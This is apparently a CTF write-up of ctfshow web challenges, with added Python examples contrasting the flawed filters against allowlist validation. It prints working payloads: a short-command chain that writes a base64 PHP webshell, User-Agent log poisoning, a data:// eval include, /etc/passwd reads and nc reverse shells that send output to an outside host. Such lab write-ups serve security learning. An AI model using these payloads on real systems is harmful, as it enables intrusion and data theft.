ctfshow-web [七夕杯 / Qixi Cup]

web签到

View the page source:

<form class="form-horizontal" role="form" action="api/tools.php" method="post" onsubmit="return check();" >
    <div class="form-group">
        <label for="command" class="col-lg-2 col-sm-2 control-label">命令</label>
        <div class="col-lg-10">
            <input onchange="help();" id="cmd" name="cmd" type="text" class="form-control"  placeholder="ls">
            <p id="help" class="help-block">仅支持较短命令执行,且不会回显。</p>
            <script>
                function help(){
                    if(isSafe($("#cmd").val())){
                        $("#help").css("color","#69cf56");
                        $("#help").html("提交命令执行");
                    }else{
                        $("#help").css("color","#ec1616");
                        $("#help").html("命令字符过长");
                    }
                }
                // the only "safety" check: command length, enforced in the browser
                function isSafe(cmd)
                {
                    return cmd.length<=7;
                }
                function check(){
                    if(isSafe($("#cmd").val())){
                        $("#help").css("color","#69cf56");
                        $("#help").html("提交命令执行");
                        return true;
                    }else{
                        $("#help").css("color","#ec1616");
                        $("#help").html("命令字符过长");
                        return false ;
                    }
                }
            </script>

The length check only runs in the browser, so request api/tools.php directly and POST the cmd parameter:

cmd=ls />r
Then fetch /api/r.

It downloads as a file with the following contents:

bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

Next, write a new shell to api/1.php.

The PoC is as follows:

payload.txt
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

    
import requests
import time

url = "http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/tools.php"

# send each line of payload.txt as one short command
with open("payload.txt", "r") as f:
    for i in f:
        data = {"cmd": i.strip()}
        r = requests.post(url=url, data=data)
        time.sleep(1)
        print(r.text)

# check whether the written shell is reachable
test = requests.get("http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/1.php")
if test.status_code == requests.codes.ok:
    print("you've got it!")

Visit /api/1.php, execute commands, and get the flag.

The nl command also works directly:

nl /*>m

easy_calc

<?php
if(check($code)){
    eval('$result='."$code".";");
    echo($result);    
}
function check(&$code){
    $num1=$_POST['num1'];
    $symbol=$_POST['symbol'];
    $num2=$_POST['num2'];
    if(!isset($num1) || !isset($num2) || !isset($symbol) )
    {
        return false;
    }
    if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol))
    {
        return false;
    }
    if(preg_match("/^[\+\-\*\/]$/", $symbol))
    {
        $code = "$num1$symbol$num2";
        return true;
    }
    return false;
}
POST /calc.php HTTP/1.1
Host: b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Content-Length: 24
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Referer: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=1&symbol=%2B&num2=3

The statement that is ultimately evaluated is the concatenation $num1$symbol$num2. Since ( is filtered, no function can be called, so by the structure of the language what remains are statements such as include, require and echo; try including a file.

Testing in a local environment:

    $num1='include "C:\Users\admin\Desktop\ip.txt";1';
    $symbol="+";
    $num2="2";

ip.txt is echoed back successfully.

num1=include "/etc/passwd";1&symbol=%2B&num2=2

passwd is echoed back successfully.

Log file inclusion:

num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2

Final request:

POST /calc.php HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 60
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: <?php system('cat /*'); ?>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2

Code execution via the data:// wrapper:

<?php eval($_GET[1]);
PD9waHAgZXZhbCgkX0dFVFsxXSk7
The closing ?> can be dropped here to avoid the trailing plus sign in the encoding.
Payload:
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1
POST /calc.php?1=system('cat+/secret')%3b HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 88
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1
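
The filter above is a blacklist, and the two payloads pass it because none of their characters are on the list. As an added example (not code from the writeup or the challenge), the following Python ports the page's regex to show exactly that, and places beside it an allowlist calculator that parses both operands as numeric literals and dispatches the operator through a table, so there is no eval for a payload to reach. The sample inputs are constructed from the requests shown above.

```python
import operator
import re
from decimal import Decimal, InvalidOperation

# The challenge's blacklist (from the page), ported to a Python character class.
# Note what it does NOT contain: " ; / : , and the letters that spell include.
BLACKLIST = re.compile(r"[!@#$%^&(_={'<>?|`~\[]")
SYMBOL_RE = re.compile(r"^[+\-*/]$")


def passes_page_filter(num1: str, symbol: str, num2: str) -> bool:
    """True when the page's check() would accept this input and go on to eval it."""
    if BLACKLIST.search(num1 + num2 + symbol):
        return False
    return SYMBOL_RE.match(symbol) is not None


# Allowlist replacement: operands must be numeric literals, the operator is
# dispatched through a table, and nothing is ever handed to eval.
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}
NUMBER_RE = re.compile(r"-?\d+(\.\d+)?")


def safe_calc(num1: str, symbol: str, num2: str):
    """Return the Decimal result, or None for anything that is not <number op number>."""
    if symbol not in OPS:
        return None
    if not (NUMBER_RE.fullmatch(num1) and NUMBER_RE.fullmatch(num2)):
        return None
    try:
        return OPS[symbol](Decimal(num1), Decimal(num2))
    except (InvalidOperation, ZeroDivisionError):
        return None


# Constructed sample inputs: the benign request and the two payloads from the page.
SAMPLES = [
    ("1", "+", "3"),
    ('include "/etc/passwd";1', "+", "2"),
    ('1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1', "/", "1"),
]

if __name__ == "__main__":
    for n1, sym, n2 in SAMPLES:
        print(f"blacklist passes={passes_page_filter(n1, sym, n2)!s:5} "
              f"allowlist result={safe_calc(n1, sym, n2)}  input={n1!r} {sym} {n2!r}")
```

Running it shows both include payloads sailing through passes_page_filter while safe_calc returns None for them and 4 for the legitimate 1 + 3; the fix is not a longer blacklist but refusing to build source code out of user input at all.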

easy_cmd

<?php

error_reporting(0);
highlight_file(__FILE__);

$cmd=$_POST['cmd'];

if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){
        exec(escapeshellcmd($cmd));
}
?>

The regex requires the submitted cmd to begin with ping, ls, nc or ifconfig; the command is then passed through escapeshellcmd.

<?php
$cmd="nc -e /bin/bash ip port";
if(preg_match("/^\b(ping|ls|nc|ifconfig|ipconfig)\b/",$cmd))
{
    $out=escapeshellcmd($cmd);
    print_r($out);
}

nc -e /bin/bash ip port

Here escapeshellcmd turns out not to modify the command at all.

So try a reverse shell with nc:

nc -e /bin/bash ip port
nc  ip port -e /bin/bash

The shell drops within a second of connecting, so instead try carrying the command output out through nc:

cmd=nc  IP port -e ls /
cmd=nc  IP port -e cat /secret
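
Both web签到 and easy_cmd come down to the same gap: the server constrains the shape of the command string (its length, or its first word) instead of the command and its arguments. As an added example serving both sections (not code from the writeup or the challenges), the Python below ports PHP's escapeshellcmd() approximately, reproduces the easy_cmd prefix regex, and contrasts them with a hypothetical allowlist runner that parses the input into argv, accepts only named commands with plain arguments, rejects options, and executes without a shell. The allowlist contents and the sample commands (taken from the two sections above) are constructed for the demonstration.

```python
import re
import shlex
import subprocess

# Characters PHP's escapeshellcmd() prefixes with a backslash (plus \n and \xff).
_META = set('#&;`|*?~<>^()[]{}$\\\n\xff')


def escapeshellcmd(cmd: str) -> str:
    """Approximate port of PHP escapeshellcmd(): escapes shell metacharacters and
    unpaired quotes, but leaves spaces and option-looking arguments untouched."""
    out = []
    closing = None  # index of the partner of the quote currently open
    for i, ch in enumerate(cmd):
        if ch in ('"', "'"):
            if closing is None:
                j = cmd.find(ch, i + 1)
                if j == -1:            # unpaired quote: escape it
                    out.append('\\' + ch)
                    continue
                closing = j            # paired: copy both verbatim
            elif closing == i:
                closing = None
            out.append(ch)
        elif ch in _META:
            out.append('\\' + ch)
        else:
            out.append(ch)
    return ''.join(out)


def page_check(cmd: str) -> bool:
    """The easy_cmd prefix regex from the page: only the first word is constrained."""
    return re.match(r"^\b(ping|ls|nc|ifconfig)\b", cmd) is not None


# Hypothetical allowlist for a command runner: command -> pattern every argument
# must fully match. nc, sh and nl are simply absent; options are rejected below.
ALLOWED = {
    "ls": re.compile(r"[A-Za-z0-9_./]+"),
    "ping": re.compile(r"[A-Za-z0-9.]+"),
}


def validate_command(cmd: str):
    """Return argv if cmd is an allowlisted command with plain arguments, else None."""
    try:
        argv = shlex.split(cmd)
    except ValueError:           # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    pattern = ALLOWED[argv[0]]
    for arg in argv[1:]:
        if arg.startswith("-") or ".." in arg or not pattern.fullmatch(arg):
            return None
    return argv


def run_validated(cmd: str, timeout: float = 5.0):
    """Execute only what validate_command() accepted, as argv and without a shell."""
    argv = validate_command(cmd)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout).stdout


# Constructed sample inputs, taken from the two sections above plus two benign ones.
SAMPLES = [
    "ls />r", ">hp", "ls -t>0", "sh 0", "nl /*>m",                  # web签到
    "nc -e /bin/bash ip port", "nc  ip port -e /bin/bash",           # easy_cmd
    "nc  IP port -e cat /secret", "ls /", "ping 10.0.0.1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:30} prefix_ok={page_check(s)!s:5} "
              f"escaped={escapeshellcmd(s)!r:30} allowlist={validate_command(s)}")
```

The output makes the two lessons visible side by side: escapeshellcmd does neutralise the > and * in the web签到 one-liners (which is why that challenge has no escaping at all), but every nc line passes both the prefix regex and escapeshellcmd unchanged because -e is just an argument, whereas validate_command admits only ls / and ping 10.0.0.1.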

easy_sql

SQL injection. First fuzz which keywords the WAF blocks; not solved yet.

Author: coleak